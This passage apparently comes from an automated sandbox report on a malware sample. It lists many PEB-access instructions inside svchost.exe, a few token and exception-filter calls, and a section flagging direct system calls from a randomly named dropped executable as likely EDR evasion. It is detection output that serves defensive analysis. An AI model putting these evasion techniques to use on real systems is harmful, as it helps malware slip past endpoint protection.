                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840535 mov eax, dword ptr fs:[00000030h]3_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840535 mov eax, dword ptr fs:[00000030h]3_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E53E mov eax, dword ptr fs:[00000030h]3_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E53E mov eax, dword ptr fs:[00000030h]3_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E53E mov eax, dword ptr fs:[00000030h]3_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E53E mov eax, dword ptr fs:[00000030h]3_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E53E mov eax, dword ptr fs:[00000030h]3_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838550 mov eax, dword ptr fs:[00000030h]3_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838550 mov eax, dword ptr fs:[00000030h]3_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386656A mov eax, dword ptr fs:[00000030h]3_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386656A mov eax, dword ptr fs:[00000030h]3_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386656A mov eax, dword ptr fs:[00000030h]3_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EA49A mov eax, dword ptr fs:[00000030h]3_2_038EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038364AB mov eax, dword ptr fs:[00000030h]3_2_038364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038644B0 mov ecx, dword ptr fs:[00000030h]3_2_038644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BA4B0 mov eax, dword ptr fs:[00000030h]3_2_038BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038304E5 mov ecx, dword ptr fs:[00000030h]3_2_038304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868402 mov eax, dword ptr fs:[00000030h]3_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868402 mov eax, dword ptr fs:[00000030h]3_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868402 mov eax, dword ptr fs:[00000030h]3_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E420 mov eax, dword ptr fs:[00000030h]3_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E420 mov eax, dword ptr fs:[00000030h]3_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E420 mov eax, dword ptr fs:[00000030h]3_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C427 mov eax, dword ptr fs:[00000030h]3_2_0382C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h]3_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h]3_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h]3_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h]3_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h]3_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h]3_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h]3_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A430 mov eax, dword ptr fs:[00000030h]3_2_0386A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h]3_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EA456 mov eax, dword ptr fs:[00000030h]3_2_038EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382645D mov eax, dword ptr fs:[00000030h]3_2_0382645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385245A mov eax, dword ptr fs:[00000030h]3_2_0385245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC460 mov ecx, dword ptr fs:[00000030h]3_2_038BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385A470 mov eax, dword ptr fs:[00000030h]3_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385A470 mov eax, dword ptr fs:[00000030h]3_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385A470 mov eax, dword ptr fs:[00000030h]3_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840BBE mov eax, dword ptr fs:[00000030h]3_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840BBE mov eax, dword ptr fs:[00000030h]3_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E4BB0 mov eax, dword ptr fs:[00000030h]3_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E4BB0 mov eax, dword ptr fs:[00000030h]3_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03850BCB mov eax, dword ptr fs:[00000030h]3_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03850BCB mov eax, dword ptr fs:[00000030h]3_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03850BCB mov eax, dword ptr fs:[00000030h]3_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830BCD mov eax, dword ptr fs:[00000030h]3_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830BCD mov eax, dword ptr fs:[00000030h]3_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830BCD mov eax, dword ptr fs:[00000030h]3_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DEBD0 mov eax, dword ptr fs:[00000030h]3_2_038DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838BF0 mov eax, dword ptr fs:[00000030h]3_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838BF0 mov eax, dword ptr fs:[00000030h]3_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838BF0 mov eax, dword ptr fs:[00000030h]3_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385EBFC mov eax, dword ptr fs:[00000030h]3_2_0385EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BCBF0 mov eax, dword ptr fs:[00000030h]3_2_038BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h]3_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385EB20 mov eax, dword ptr fs:[00000030h]3_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385EB20 mov eax, dword ptr fs:[00000030h]3_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F8B28 mov eax, dword ptr fs:[00000030h]3_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F8B28 mov eax, dword ptr fs:[00000030h]3_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E4B4B mov eax, dword ptr fs:[00000030h]3_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E4B4B mov eax, dword ptr fs:[00000030h]3_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6B40 mov eax, dword ptr fs:[00000030h]3_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6B40 mov eax, dword ptr fs:[00000030h]3_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D8B42 mov eax, dword ptr fs:[00000030h]3_2_038D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FAB40 mov eax, dword ptr fs:[00000030h]3_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DEB50 mov eax, dword ptr fs:[00000030h]3_2_038DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382CB7E mov eax, dword ptr fs:[00000030h]3_2_0382CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h]3_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904A80 mov eax, dword ptr fs:[00000030h]3_2_03904A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868A90 mov edx, dword ptr fs:[00000030h]3_2_03868A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838AA0 mov eax, dword ptr fs:[00000030h]3_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838AA0 mov eax, dword ptr fs:[00000030h]3_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03886AA4 mov eax, dword ptr fs:[00000030h]3_2_03886AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03886ACC mov eax, dword ptr fs:[00000030h]3_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03886ACC mov eax, dword ptr fs:[00000030h]3_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03886ACC mov eax, dword ptr fs:[00000030h]3_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830AD0 mov eax, dword ptr fs:[00000030h]3_2_03830AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03864AD0 mov eax, dword ptr fs:[00000030h]3_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03864AD0 mov eax, dword ptr fs:[00000030h]3_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386AAEE mov eax, dword ptr fs:[00000030h]3_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386AAEE mov eax, dword ptr fs:[00000030h]3_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BCA11 mov eax, dword ptr fs:[00000030h]3_2_038BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386CA24 mov eax, dword ptr fs:[00000030h]3_2_0386CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385EA2E mov eax, dword ptr fs:[00000030h]3_2_0385EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03854A35 mov eax, dword ptr fs:[00000030h]3_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03854A35 mov eax, dword ptr fs:[00000030h]3_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386CA38 mov eax, dword ptr fs:[00000030h]3_2_0386CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h]3_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h]3_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h]3_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h]3_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h]3_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h]3_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h]3_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840A5B mov eax, dword ptr fs:[00000030h]3_2_03840A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840A5B mov eax, dword ptr fs:[00000030h]3_2_03840A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386CA6F mov eax, dword ptr fs:[00000030h]3_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386CA6F mov eax, dword ptr fs:[00000030h]3_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386CA6F mov eax, dword ptr fs:[00000030h]3_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DEA60 mov eax, dword ptr fs:[00000030h]3_2_038DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038ACA72 mov eax, dword ptr fs:[00000030h]3_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038ACA72 mov eax, dword ptr fs:[00000030h]3_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h]3_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h]3_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h]3_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h]3_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h]3_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h]3_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h]3_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h]3_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h]3_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h]3_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h]3_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h]3_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h]3_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038309AD mov eax, dword ptr fs:[00000030h]3_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038309AD mov eax, dword ptr fs:[00000030h]3_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B89B3 mov esi, dword ptr fs:[00000030h]3_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B89B3 mov eax, dword ptr fs:[00000030h]3_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B89B3 mov eax, dword ptr fs:[00000030h]3_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C69C0 mov eax, dword ptr fs:[00000030h]3_2_038C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h]3_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h]3_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h]3_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h]3_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h]3_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h]3_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038649D0 mov eax, dword ptr fs:[00000030h]3_2_038649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA9D3 mov eax, dword ptr fs:[00000030h]3_2_038FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE9E0 mov eax, dword ptr fs:[00000030h]3_2_038BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038629F9 mov eax, dword ptr fs:[00000030h]3_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038629F9 mov eax, dword ptr fs:[00000030h]3_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE908 mov eax, dword ptr fs:[00000030h]3_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE908 mov eax, dword ptr fs:[00000030h]3_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC912 mov eax, dword ptr fs:[00000030h]3_2_038BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828918 mov eax, dword ptr fs:[00000030h]3_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828918 mov eax, dword ptr fs:[00000030h]3_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B892A mov eax, dword ptr fs:[00000030h]3_2_038B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C892B mov eax, dword ptr fs:[00000030h]3_2_038C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0946 mov eax, dword ptr fs:[00000030h]3_2_038B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03856962 mov eax, dword ptr fs:[00000030h]3_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03856962 mov eax, dword ptr fs:[00000030h]3_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03856962 mov eax, dword ptr fs:[00000030h]3_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387096E mov eax, dword ptr fs:[00000030h]3_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387096E mov edx, dword ptr fs:[00000030h]3_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387096E mov eax, dword ptr fs:[00000030h]3_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D4978 mov eax, dword ptr fs:[00000030h]3_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D4978 mov eax, dword ptr fs:[00000030h]3_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC97C mov eax, dword ptr fs:[00000030h]3_2_038BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830887 mov eax, dword ptr fs:[00000030h]3_2_03830887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC89D mov eax, dword ptr fs:[00000030h]3_2_038BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E8C0 mov eax, dword ptr fs:[00000030h]3_2_0385E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA8E4 mov eax, dword ptr fs:[00000030h]3_2_038FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C8F9 mov eax, dword ptr fs:[00000030h]3_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C8F9 mov eax, dword ptr fs:[00000030h]3_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC810 mov eax, dword ptr fs:[00000030h]3_2_038BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov eax, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov eax, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov eax, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov ecx, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov eax, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov eax, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A830 mov eax, dword ptr fs:[00000030h]3_2_0386A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D483A mov eax, dword ptr fs:[00000030h]3_2_038D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D483A mov eax, dword ptr fs:[00000030h]3_2_038D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03842840 mov ecx, dword ptr fs:[00000030h]3_2_03842840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860854 mov eax, dword ptr fs:[00000030h]3_2_03860854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834859 mov eax, dword ptr fs:[00000030h]3_2_03834859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834859 mov eax, dword ptr fs:[00000030h]3_2_03834859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE872 mov eax, dword ptr fs:[00000030h]3_2_038BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE872 mov eax, dword ptr fs:[00000030h]3_2_038BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6870 mov eax, dword ptr fs:[00000030h]3_2_038C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6870 mov eax, dword ptr fs:[00000030h]3_2_038C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386CF80 mov eax, dword ptr fs:[00000030h]3_2_0386CF80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03862F98 mov eax, dword ptr fs:[00000030h]3_2_03862F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03862F98 mov eax, dword ptr fs:[00000030h]3_2_03862F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832FC8 mov eax, dword ptr fs:[00000030h]3_2_03832FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832FC8 mov eax, dword ptr fs:[00000030h]3_2_03832FC8
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003B80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_003B80A9
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_0038A124 SetUnhandledExceptionFilter,0_2_0038A124
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_0038A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0038A155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtTerminateThread: Direct from: 0x77672FCCJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtProtectVirtualMemory: Direct from: 0x77667B2EJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtAllocateVirtualMemory: Direct from: 0x77672BECJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
